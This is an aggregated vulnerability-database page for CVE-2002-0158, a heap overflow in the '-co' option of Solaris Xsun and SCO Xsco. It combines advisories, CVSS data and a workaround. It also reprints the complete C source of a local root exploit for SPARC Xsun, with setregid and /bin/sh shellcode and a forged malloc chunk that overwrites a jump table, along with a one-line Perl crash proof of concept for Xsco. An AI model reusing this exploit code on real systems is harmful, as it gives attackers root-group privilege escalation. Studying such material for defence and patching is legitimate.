CVE-2002-0158
CVSS 7.2
Published: 2002-04-02 00:00:00
Revised: 2016-10-17 22:16:37

[Original] Buffer overflow in Xsun on Solaris 2.6 through 8 allows local users to gain root privileges via a long -co (color database) command line argument.


[CNNVD] Solaris Xsun "-co" parameter buffer overflow vulnerability (CNNVD-200204-008)

        
        Xsun is the X Window server (for X11) on the Solaris platform. It is installed under /usr/openwin/bin/. On SPARC it is installed setgid root; on x86 it is installed setuid root.
        Xsun accepts a command-line option, "-co", that specifies the colour database file. Because the length of the user-supplied file name is not checked, an attacker can trigger a heap overflow. With carefully constructed overflow data, an attacker can execute arbitrary code as the root user or with root group privileges.
        If an attacker supplies an over-long value for the "-co" option (for example, longer than 6000 bytes), a dynamically allocated buffer is overflowed; by overwriting the boundary data structures of the adjacent heap chunk, properties of the malloc()/free() implementation can be used to overwrite arbitrary memory addresses, such as saved return addresses or function pointers.
        On SPARC, the attacker may gain root group privileges. On x86, the attacker may gain root user privileges.
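As an added illustration of the bug class described above (not Xsun source, which the page does not show), the unchecked and the checked handling of a "-co" value in C, with the length check the description says was missing; `RGB_PATH_MAX`, the function names and the 6000-byte test value are assumptions of this example:

```c
#include <stdlib.h>
#include <string.h>

#define RGB_PATH_MAX 1024   /* assumed limit; Xsun's real buffer size is not on the page */

/* Vulnerable pattern: the -co value goes into a fixed-size heap chunk with no
 * length check, so a long value runs into the next chunk's boundary metadata. */
char *set_rgb_db_unchecked(const char *arg) {
    char *path = malloc(RGB_PATH_MAX);
    if (path != NULL)
        strcpy(path, arg);          /* unbounded copy: heap overflow on a long value */
    return path;
}

/* Hardened form: refuse any value with no terminator inside the limit, then
 * allocate exactly the measured length so the copy cannot overrun. */
char *set_rgb_db_checked(const char *arg) {
    const char *end = memchr(arg, '\0', RGB_PATH_MAX);
    if (end == NULL)
        return NULL;                /* too long: rejected before any allocation */
    size_t n = (size_t)(end - arg);
    char *path = malloc(n + 1);
    if (path != NULL)
        memcpy(path, arg, n + 1);
    return path;
}

/* Minimal argv scan for "-co <file>": 0 = accepted, 1 = option absent,
 * -1 = operand missing, -2 = operand rejected as too long. */
int parse_co_option(int argc, char *argv[], char **out) {
    *out = NULL;
    for (int i = 1; i < argc; i++) {
        if (strcmp(argv[i], "-co") != 0)
            continue;
        if (i + 1 >= argc)
            return -1;
        *out = set_rgb_db_checked(argv[i + 1]);
        return *out ? 0 : -2;
    }
    return 1;
}

/* Self-check with a constructed 6000-byte operand, the length the advisory
 * cites: the checked parser must reject it without copying anything. */
int demo_long_arg_rejected(void) {
    static char big[6001];
    memset(big, 'A', sizeof big - 1);
    char *argv[] = { "Xsun", "-co", big, ":1" };
    char *path;
    return parse_co_option(4, argv, &path) == -2 && path == NULL;
}
```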
        

- CVSS (base score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may bring the system down completely]
Access complexity: LOW [no access restrictions on exploitation]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication required for exploitation]

- CPE (affected platforms and products)

cpe:/o:sun:solaris:2.6::x86
cpe:/o:sun:solaris:8.0::x86
cpe:/o:sun:solaris:7.0::x86
cpe:/o:sun:solaris:2.6::sparc
cpe:/o:sun:solaris:8.0::sparc
cpe:/o:sun:solaris:7.0::sparc

- OVAL (technical details for detection)

oval:org.mitre.oval:def:33  Sun Solaris 7 XSun Color Database File Heap Overflow
oval:org.mitre.oval:def:14  Sun Solaris 8 XSun Color Database File Heap Overflow
* OVAL describes in detail how to detect this vulnerability; see the related OVAL definitions for further technical detail on detection.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0158
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0158
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200204-008
(official data source) CNNVD

- Other links and resources

http://archives.neohapsis.com/archives/vulnwatch/2002-q2/0000.html
(VENDOR_ADVISORY)  VULNWATCH  20020402 NSFOCUS SA2002-01: Sun Solaris Xsun "-co" heap overflow
http://marc.info/?l=bugtraq&m=101776858410652&w=2
(UNKNOWN)  BUGTRAQ  20020402 NSFOCUS SA2002-01: Sun Solaris Xsun "-co" heap overflow
http://sunsolve.Sun.COM/pub-cgi/retrieve.pl?doc=fpatches%2F108652
(UNKNOWN)  CONFIRM  http://sunsolve.Sun.COM/pub-cgi/retrieve.pl?doc=fpatches%2F108652
http://www.securityfocus.com/bid/4408
(UNKNOWN)  BID  4408
http://xforce.iss.net/xforce/xfdb/8703
(UNKNOWN)  XF  solaris-xsun-co-bo(8703)

- Vulnerability information

Solaris Xsun "-co" parameter buffer overflow vulnerability
High risk  Boundary condition error
2002-04-02 00:00:00  2005-05-13 00:00:00
Local
        
        

- Advisories and patches

        Temporary workaround:
        If you cannot install a patch or upgrade immediately, CNNVD recommends the following measure to reduce the risk:
        * Temporarily remove the suid root / sgid root bit from Xsun:
        # chmod a-s /usr/openwin/bin/Xsun
        Vendor patch:
        Sun
        ---
        The vendor has not yet provided a patch or upgrade; users of this software are advised to watch the vendor's home page for the latest version:
        
        http://www.sun.com

- Vulnerability information (21360)

Sun Solaris 2.6/7.0/8 XSun Color Database File Heap Overflow Vulnerability (EDBID:21360)
solaris local
2002-04-02 Verified
0 gloomy
N/A [Download]
source: http://www.securityfocus.com/bid/4408/info

Solaris is the freely available Unix operating system distributed by Sun Microsystems.

It may be possible for a local user to gain elevated privileges. When Xsun is executed, and an excessively long argument is supplied to the -co flag, a heap overflow occurs. This problem could allow a local user to supply a maliciously formatted string with the -co option that could result in the execution of arbitrary code, and elevated privileges. 

/* Xsun(sparc) local exploit
   by gloomy (gloomy@root66.org) & eSDee (esdee@netric.org)
   ------------------------------------------------------------------
     Xsun is a Solaris server for X version 11. This program contains
   an option that is not really secure nowadays :).
   The option is used to determine the color database file. And yeah,
   indeed, you guessed it already, it contains a heap overflow.

     When we were busy writing this exploit within a multi display
   screen, we discovered some weird "unable-to-write-over-stackframe"
   problems. We tried everything to just write a few bytes over a
   saved program counter, but unfortunately it was not possible on the
   current machine we were using. Then eSDee came up with something
   new. In the middle of the night a loud "yippeaaaaaa!" came out of
   the bedroom of mister Es. He discovered a little section just
   below the GOT. It didn't contain \0 bytes and it was writeable.
   It's called the ti_jmp_table. I'm sure eSDee will write some
   papers about it soon.

     Gloomy was busy writing a shellcode that re-opens the STDIN. He
   found out that he just could open /dev/tty and then duplicate the
   STDERR filedescriptor, so the important descriptors were back
   again.

   USAGE:
        ./Xsun-expl [retloc] [ret]

   Example:
        bash$ gcc -o Xsun-expl Xsun-expl.c -Wall -Werror
        bash$ ./Xsun-expl
        Couldn't open RGB_DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.....
        ...
        bash$ id
        uid=500(user) gid=0(root)

   Greets and kisses:
        #netric                 - www.netric.org
        #root66                 - www.root66.org
        mostlyharmless          - www.mostly-harmless.nl [soon]
        dB_____                 - gloomy's fine brother! :)
        squezel                 - you're a fine little fellow.

   More information available at: http://online.securityfocus.com/advisories/4009

   [ps. what a clumsy text]
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>     /* memset, memcpy, strlen */
#include <unistd.h>

#define PATH            "/usr/openwin/bin/Xsun"
#define DISPLAY         ":1"
#define SIZE            5128

#define RET             0xffbef7bc
#define RETLOC          0xfecbea30      /* <ti_jmp_table+4> (a pointer to _return_zero) */
#define DUMMY           0xac1db0ef

struct WORD {
        long element;
        long dummy;
};

struct TREE {
        struct WORD    t_s;    /* size of this element */
        struct WORD    t_p;    /* parent node */
        struct WORD    t_l;    /* left child */
        struct WORD    t_r;    /* right child */
        struct WORD    t_n;    /* next in link list */
        struct WORD    t_d;    /* dummy to reserve space for self-pointer */
};

char
shellcode[]=

        /*
                setregid(0,0);                          setting root permissions
                open("/dev/tty", RD_ONLY);              re-open STDIN
                dup(2);                                 duplicate STDOUT to STDERR
                execve("/bin//sh", &argv[0], NULL);     start the shell
                exit();                                 exit
        */

        "\x90\x1d\x80\x16"      // xor          %l6, %l6, %o0
        "\x92\x1d\x80\x16"      // xor          %l6, %l6, %o1
        "\x82\x18\x40\x01"      // xor          %g1, %g1, %g1
        "\x82\x10\x20\xcb"      // mov          0x2e, %g1
        "\x91\xd0\x20\x08"      // ta           8                       [setregid(0,0)]

        "\x21\x0b\xd9\x19"      // sethi        %hi(0x2f646400), %l0
        "\xa0\x14\x21\x76"      // or           %l0, 0x176, %l0
        "\x23\x0b\xdd\x1d"      // sethi        %hi(0x2f747400), %l1
        "\xa2\x14\x60\x79"      // or           %l1, 0x79, %l1
        "\xe0\x3b\xbf\xf8"      // std          %l0, [ %sp - 0x8 ]
        "\x90\x23\xa0\x08"      // sub          %sp, 8, %o0
        "\x92\x1b\x80\x0e"      // xor          %sp, %sp, %o1
        "\x82\x10\x20\x05"      // mov          0x05, %g1
        "\x91\xd0\x20\x08"      // ta           8                       [open("/dev/tty",RD_ONLY)]

        "\x90\x10\x20\x02"      // mov          0x02, %o0
        "\x82\x10\x20\x29"      // mov          0x29, %g1
        "\x91\xd0\x20\x08"      // ta           8                       [dup(2)]

        "\x21\x0b\xd8\x9a"      // sethi        %hi(0x2f626800), %l0
        "\xa0\x14\x21\x6e"      // or           %l0, 0x16e, %l0
        "\x23\x0b\xcb\xdc"      // sethi        %hi(0x2f2f7000), %l1
        "\xa2\x14\x63\x68"      // or           %l1, 0x368, %l1
        "\xe0\x3b\xbf\xf0"      // std          %l0, [ %sp - 0x10 ]
        "\xc0\x23\xbf\xf8"      // clr          [ %sp - 0x8 ]
        "\x90\x23\xa0\x10"      // sub          %sp, 0x10, %o0
        "\xc0\x23\xbf\xec"      // clr          [ %sp - 0x14 ]
        "\xd0\x23\xbf\xe8"      // st           %o0, [ %sp - 0x18 ]
        "\x92\x23\xa0\x18"      // sub          %sp, 0x18, %o1
        "\x94\x22\x80\x0a"      // sub          %o2, %o2, %o2
        "\x82\x18\x40\x01"      // xor          %g1, %g1, %g1
        "\x82\x10\x20\x3b"      // mov          0x3b, %g1
        "\x91\xd0\x20\x08"      // ta           8                       [execve("/bin/sh","/bin/sh",NULL)]

        "\x82\x10\x20\x01"      // mov          0x01, %g1
        "\x91\xd0\x20\x08"      // ta           8                       [exit(?)]

        "\x10\xbf\xff\xdf"      // b            shellcode
        "\x90\x1d\x80\x16";     // or           %o1, %o1, %o1

int
main(int argc, char *argv[])
{
        struct TREE faketree;                           // our friendly little tree

        char buffer[SIZE+sizeof(faketree)+1];

        unsigned int ret          = RET;
        unsigned int retloc       = RETLOC;
        unsigned int dummy        = DUMMY;

        if (argc > 1) retloc    = strtoul(argv[1], &argv[1], 16);
        if (argc > 2) ret       = strtoul(argv[2], &argv[2], 16);

        /* fake chunk header placed right after the overflowed buffer */
        faketree.t_s.element = 0xfffffff0;
        faketree.t_s.dummy   = dummy;
        faketree.t_n.element = retloc - 8;
        faketree.t_n.dummy   = dummy;
        faketree.t_l.element = 0xffffffff;
        faketree.t_l.dummy   = dummy;
        faketree.t_r.element = dummy;
        faketree.t_r.dummy   = dummy;
        faketree.t_p.element = ret;
        faketree.t_p.dummy   = dummy;
        faketree.t_d.element = dummy;
        faketree.t_d.dummy   = dummy;

        memset(buffer, 0x41, sizeof(buffer));
        memcpy(buffer + 3999 - (strlen(shellcode) - 8), shellcode, strlen(shellcode));
        memcpy(buffer + SIZE, &faketree, sizeof(faketree));
        buffer[SIZE + sizeof(faketree)] = 0x0;

        fprintf(stdout, "Retloc = 0x%08x\n"
                        "Ret    = 0x%08x\n",
                        retloc, ret);

        execl(PATH, "Xsun", "-co", buffer, DISPLAY, NULL);
        return 0;
}

/* [eof] */

		

- Vulnerability information (F31839)

SCOX.txt (PacketStormID:F31839)
2003-10-16 00:00:00

advisory,local,vulnerability
CVE-2002-0158,CVE-2002-0164
[Download]

SCO Security Advisory - SCO OpenServer 5.0.5, 5.0.6, and 5.0.7 has had multiple vulnerabilities discovered in Xsco. One matches the command line parameter -co hole discovered in Xsun and another allows any local user with X access to gain read/write access to a shared memory segment.

______________________________________________________________________________

			SCO Security Advisory

Subject:		OpenServer 5.0.7 OpenServer 5.0.6 OpenServer 5.0.5 : Multiple security vulnerabilities in Xsco
Advisory number: 	CSSA-2003-SCO.26
Issue date: 		2003 October 10
Cross reference: 	sr862609 fz520528 erg712006 sr860995 fz520242 erg711972 CAN-2002-0158 CAN-2002-0164 
______________________________________________________________________________


1. Problem Description

	This supplement corrects two unrelated security problems in the
        SCO OpenServer "Xsco" X11 server.

        First,

	NSFOCUS Security Team has found a buffer overflow vulnerability
	in Xsun shipped with Solaris system when processing a
	command line parameter "-co", which could enable a local
	attacker to run arbitrary code with root user/root group
	privilege. 
	 
	Kevin Finisterre of Snosoft.com discovered that Xsco was also
	vulnerable. 
	 
	The Common Vulnerabilities and Exposures (CVE) project has assigned 
	the name CAN-2002-0158 to this issue. This is a candidate for 
	inclusion in the CVE list (http://cve.mitre.org), which standardizes 
	names for security problems. Candidates may change significantly
	before they become official CVE entries.

	Second,

	Roberto Zunino discovered a vulnerability in the MIT-SHM extension in
	all X servers that are running as root.

	Any user with local X access can exploit the MIT-SHM extension and gain
	read/write access to any shared memory segment on the system. 

	The Common Vulnerabilities and Exposures (CVE) project has assigned
        the name CAN-2002-0164 to this issue. This is a candidate for
        inclusion in the CVE list (http://cve.mitre.org), which standardizes
        names for security problems. Candidates may change significantly
        before they become official CVE entries.


2. Vulnerable Supported Versions

	System				Binaries
	----------------------------------------------------------------------
	OpenServer 5.0.7 		/usr/bin/X11/Xsco
	OpenServer 5.0.6 		/usr/bin/X11/Xsco
	OpenServer 5.0.5 		/usr/bin/X11/Xsco


3. Solution

	The proper solution is to install the latest packages.


4. OpenServer 5.0.7, OpenServer 5.0.6, OpenServer 5.0.5

	4.1 Location of Fixed Binaries

	ftp://ftp.sco.com/pub/updates/OpenServer/CSSA-2003-SCO.26


	4.2 Verification

	MD5 (VOL.000.000) = e7cbf7a8094ba43d44a6657a95673aeb
	MD5 (VOL.001.000) = 2eca28ac86436cec5fa7f059ab2fe850

	md5 is available for download from
		ftp://ftp.sco.com/pub/security/tools


	4.3 Installing Fixed Binaries

	Upgrade the affected binaries with the following sequence:

	1) Download the VOL* files to the /tmp directory

	2) Run the custom command, specify an install from media
	images, and specify the /tmp directory as the location of
	the images.


5. References

	Specific references for this advisory:
		http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0158 
		http://marc.theaimsgroup.com/?l=bugtraq&m=101776858410652&w=2 
		http://archives.neohapsis.com/archives/vulnwatch/2002-q2/0000.html
		http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0164
		http://marc.theaimsgroup.com/?l=bugtraq&m=103547625009363&w=2
		http://xforce.iss.net/xforce/xfdb/8706
		http://www.securityfocus.com/bid/4396
		http://www.linuxsecurity.com/advisories/caldera_advisory-2006.html
		ftp://stage.caldera.com/pub/security/openunix/CSSA-2002-SCO.14/CSSA-2002-SCO.14.txt
	SCO security resources:

		http://www.sco.com/support/security/index.html

	This security fix closes SCO incidents sr862609 fz520528
	erg712006 sr860995 fz520242 erg711972


6. Disclaimer

	SCO is not responsible for the misuse of any of the information
	we provide on this website and/or through our security
	advisories. Our advisories are a service to our customers
	intended to promote secure installation and use of SCO
	products.

7. Acknowledgments

	SCO would like to thank the NSFOCUS Security Team for finding
        the "-co" vulnerability, and Kevin Finisterre of Snosoft.com for
        confirming its applicability to Xsco.  SCO would also like to
        thank Roberto Zunino for discovering the MIT-SHM vulnerability.

______________________________________________________________________________


- Vulnerability information

8703
Solaris Xsun -co Argument Local Overflow
Local Access Required  Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

- Timeline

2002-04-02 Unknown
2002-04-02 Unknown

- Solution

Products

Unknown or Incomplete

- References

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

Caldera OpenServer XSCO Color Database File Heap Overflow Vulnerability
Boundary Condition Error 4985
No Yes
2002-06-11 12:00:00 2009-07-11 01:56:00
Vulnerability discovery credited to KF <dotslash@snosoft.com>.

- Affected program versions

SCO Open Server 5.0.7
SCO Open Server 5.0.6
SCO Open Server 5.0.5
SCO Open Server 5.0.4
SCO Open Server 5.0.3
SCO Open Server 5.0.2
SCO Open Server 5.0.1
SCO Open Server 5.0

- Vulnerability discussion

OpenServer is a commercial Unix operating system originally developed by SCO and distributed by Caldera.

It may be possible for a local user to gain elevated privileges. When Xsco is executed, and an excessively long argument is supplied to the -co flag, a heap overflow occurs. This problem could allow a local user to supply a maliciously formatted string with the -co option that could result in the execution of arbitrary code, and elevated privileges.

- Exploit

The following proof of concept has been made available:

./Xsco :1 -co `perl -e 'print "A" x 9000'`

- Solution

SCO has released advisory CSSA-2003-SCO.26 to address this issue.

SCO Open Server 5.0
SCO Open Server 5.0.1
SCO Open Server 5.0.2
SCO Open Server 5.0.3
SCO Open Server 5.0.4
SCO Open Server 5.0.5
SCO Open Server 5.0.6
SCO Open Server 5.0.7

- References